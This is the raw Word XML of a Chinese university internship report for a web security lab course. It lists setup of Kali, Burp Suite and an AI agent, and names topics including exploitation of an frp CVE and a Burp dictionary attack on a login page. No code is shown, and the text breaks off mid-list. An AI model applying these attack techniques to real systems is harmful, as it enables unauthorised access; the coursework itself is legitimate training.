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C576D">
      <w:pPr>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="374" w:lineRule="atLeast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99060</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3543300" cy="1071245"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone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22DED1">
      <w:pPr>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="374" w:lineRule="atLeast"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29CAD942">
      <w:pPr>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="306" w:lineRule="atLeast"/>
        <w:ind w:firstLine="2517"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65FD90F1">
      <w:pPr>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="555" w:lineRule="atLeast"/>
        <w:ind w:firstLine="873"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BAE50D5">
      <w:pPr>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="776" w:lineRule="atLeast"/>
        <w:ind w:firstLine="839"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="华文标宋"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="42"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="795FC8B4">
      <w:pPr>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="776" w:lineRule="atLeast"/>
        <w:ind w:firstLine="839"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="华文标宋" w:eastAsia="华文标宋"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="42"/>
        </w:rPr>
        <w:t>本　科　实　习　报　告</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA38C9C">
      <w:pPr>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="306" w:lineRule="atLeast"/>
        <w:ind w:firstLine="839"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F563A2E">
      <w:pPr>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="306" w:lineRule="atLeast"/>
        <w:ind w:firstLine="839"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:anchor distT="107950" distB="107950" distL="107950" distR="107950" simplePos="0" relativeHeight="251659264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3291840</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1485900" cy="1288415"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest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algn="ctr" rotWithShape="0">
                        <a:srgbClr val="A0A0A4"/>
                      </a:outerShdw>
                    </a:effectLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A02B3B4">
      <w:pPr>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="306" w:lineRule="atLeast"/>
        <w:ind w:firstLine="839"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64B4D4AF">
      <w:pPr>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="306" w:lineRule="atLeast"/>
        <w:ind w:firstLine="839"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="085024AE">
      <w:pPr>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="306" w:lineRule="atLeast"/>
        <w:ind w:firstLine="839"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="059BD84B">
      <w:pPr>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="306" w:lineRule="atLeast"/>
        <w:ind w:firstLine="839"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46C567BF">
      <w:pPr>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="385" w:lineRule="atLeast"/>
        <w:ind w:firstLine="623"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E29F490">
      <w:pPr>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="385" w:lineRule="atLeast"/>
        <w:ind w:firstLine="623"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A97FA8C">
      <w:pPr>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="385" w:lineRule="atLeast"/>
        <w:ind w:firstLine="623"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4373BC94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>学　　院　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
          <w:b/>
          <w:sz w:val="31"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
          <w:b/>
          <w:sz w:val="31"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
          <w:b/>
          <w:sz w:val="31"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
          <w:b/>
          <w:sz w:val="31"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">网络空间安全学院   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
          <w:b/>
          <w:sz w:val="31"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
          <w:b/>
          <w:sz w:val="31"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
          <w:b/>
          <w:sz w:val="31"/>
        </w:rPr>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
          <w:b/>
          <w:sz w:val="31"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">                                  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
          <w:b/>
          <w:sz w:val="31"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>　　</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A164CF0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>学生姓名　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
          <w:b/>
          <w:sz w:val="31"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">     　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
          <w:b/>
          <w:sz w:val="31"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
          <w:b/>
          <w:sz w:val="31"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">   　　　　　　 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54925E7D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 xml:space="preserve">专　　业  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
          <w:b/>
          <w:sz w:val="31"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
          <w:b/>
          <w:sz w:val="31"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>网络空间安全</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
          <w:b/>
          <w:sz w:val="31"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>　　　　</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3FD04F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 xml:space="preserve">学　　号  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
          <w:b/>
          <w:sz w:val="31"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">       202</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
          <w:b/>
          <w:sz w:val="31"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
          <w:b/>
          <w:sz w:val="31"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>141531000  　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
          <w:b/>
          <w:sz w:val="31"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
          <w:b/>
          <w:sz w:val="31"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41271395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 xml:space="preserve">年　　级  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
          <w:b/>
          <w:sz w:val="31"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">          202</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
          <w:b/>
          <w:sz w:val="31"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>4级</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
          <w:b/>
          <w:sz w:val="31"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13270D67">
      <w:pPr>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="822" w:lineRule="atLeast"/>
        <w:ind w:firstLine="1400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
          <w:b/>
          <w:sz w:val="31"/>
        </w:rPr>
        <w:t xml:space="preserve">指导教师  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
          <w:b/>
          <w:sz w:val="31"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">        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>陈腾</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
          <w:b/>
          <w:sz w:val="31"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C39ECD3">
      <w:pPr>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="742" w:lineRule="atLeast"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="353F54A3">
      <w:pPr>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="742" w:lineRule="atLeast"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="599EBFF7">
      <w:pPr>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="572" w:lineRule="atLeast"/>
        <w:ind w:firstLine="623"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
          <w:b/>
          <w:sz w:val="31"/>
        </w:rPr>
        <w:t>教务处制表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A373CE6">
      <w:pPr>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="572" w:lineRule="atLeast"/>
        <w:ind w:firstLine="623"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
          <w:b/>
          <w:sz w:val="31"/>
        </w:rPr>
        <w:t>二〇二六</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
          <w:b/>
          <w:sz w:val="31"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
          <w:b/>
          <w:sz w:val="31"/>
        </w:rPr>
        <w:t>七</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
          <w:b/>
          <w:sz w:val="31"/>
        </w:rPr>
        <w:t>月</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
          <w:b/>
          <w:sz w:val="31"/>
        </w:rPr>
        <w:t>二十七</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
          <w:b/>
          <w:sz w:val="31"/>
        </w:rPr>
        <w:t>日</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7428190C">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="156" w:beforeLines="50" w:line="400" w:lineRule="exact"/>
        <w:ind w:right="284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课程名称：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">网络安全实践-2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>　</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4155C4DD">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="156" w:beforeLines="50" w:line="400" w:lineRule="exact"/>
        <w:ind w:right="284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课程号码：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">　 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>31404</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>020</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>　　</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126E3485">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="156" w:beforeLines="50" w:line="400" w:lineRule="exact"/>
        <w:ind w:right="284"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>实习周数：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>　　　　2　　　　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>　　课程学分：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">　 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>　2　　　　　</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E18AD0">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="156" w:beforeLines="50" w:line="400" w:lineRule="exact"/>
        <w:ind w:right="284"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>实习单位：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>四川讯方信息技术有限公司</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>　　实习地点：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>四川大学空天科学与工程学院四楼401</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>　</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9725C0">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="156" w:beforeLines="50" w:line="400" w:lineRule="exact"/>
        <w:ind w:right="284"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>实习时间：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>　2026年7月18日-7月27日</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14902EF0">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="380" w:lineRule="exact"/>
        <w:ind w:right="286"/>
        <w:rPr>
          <w:sz w:val="24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225C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656E26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一、实习目的、要求：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61AE64F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color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
              </w:rPr>
              <w:t>、实习目的</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="205FAF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80" w:firstLineChars="20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本次校内综合实训为网络空间安全专业必修实践环节，依托 AI+Web 安全实战模式，旨在让学生掌握 Python Flask 开发与全套安全工具运维能力，吃透十大 Web 漏洞成因、利用与加固方案。通过小组完成用户管理平台项目，熟悉 AI 代码审计、自动化攻防脚本开发，建立标准化工程开发流程。同步锻炼团队协作、项目交付与技术答辩能力，兼顾基础开发与安全攻防双向技能提升，树立 AI 开发安全风险防范意识，贴合企业网络安全岗位实战需求。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D7DC12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82" w:firstLineChars="20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bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
              </w:rPr>
              <w:t>、实习基本要求</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13BF75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80" w:firstLineChars="20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学生需具备基础编程与网络知识，全程以 AI 辅助开发，重点完成漏洞挖掘与加固，分层完成基础任务与高阶拓展内容。严格执行每日日清交付、双重考勤制度，规范 Git 版本管理，完整留存攻防日志与双版本项目代码。独立完成漏洞实操，杜绝抄袭，缺勤超 2 天将取消考核答辩资格。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C9A6759"/>
          <w:p w14:paraId="7A7BA98E">
            <w:pPr>
              <w:rPr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二、实习主要内容</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75249FE6">
            <w:pPr>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>实训以 Kali Linux 为基础平台，以 Flask Web 用户管理系统为实训项目，从攻防双视角系统性地开展了以下实训内容：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19172960">
            <w:pPr>
              <w:ind w:firstLine="420"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="289B143B">
            <w:pPr>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>0x01 Kali 操作系统初始化：完成 Kali Linux 2026 的安装与系统初始化配置，包括系统更新、网络配置、中文环境设置、基础工具链（git、curl、wget、python3 等）安装，建立标准化的渗透测试工作环境。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6063D26E">
            <w:pPr>
              <w:ind w:firstLine="420"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="708CAC3C">
            <w:pPr>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>0x02 AI 系统安装：部署 OpenClaw AI Agent 系统，完成基础配置与插件安装，建立 AI 辅助安全分析的工作环境，为后续自动化漏洞分析和报告撰写奠定基础。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FB877AD">
            <w:pPr>
              <w:ind w:firstLine="420"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="42D407AE">
            <w:pPr>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>0x03 OpenClaw 安装对接 QQ Bot：完成 OpenClaw AI Agent 与 QQ Bot 通道的对接配置，实现了通过 QQ 与 AI Agent 实时交互的能力，包括消息接收、命令执行、结果反馈等功能的调试与验证。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B378443">
            <w:pPr>
              <w:ind w:firstLine="420"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7BD9E750">
            <w:pPr>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>0x04 密码安全：系统学习了密码安全相关知识，包括：0x01 常见部署系统默认用户密码（路由器、数据库、中间件等默认账号密码梳理）；0x02 用户名密码泄露（泄露途径分析：数据库注入、日志泄漏、社工库等；密码保护策略）；0x03 TOP7 CVE-2026-40910 frp 漏洞（frp 内网穿透工具的最新高危漏洞分析与利用）；0x04 Burp Suite 安装（Kali 下 Burp Suite Community/Professional 的安装配置过程）；0x05 代理设置（Burp Suite 代理监听配置、浏览器代理设置、HTTPS 证书导入）；0x06 BP 进行字典攻击（使用 Burp Suite Intruder 模块搭配密码字典对登录接口进行暴力破解攻击实验）。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="718BD442">
            <w:pPr>
              <w:ind w:firstLine="420"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1C5ACCE8">
            <w:pPr>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
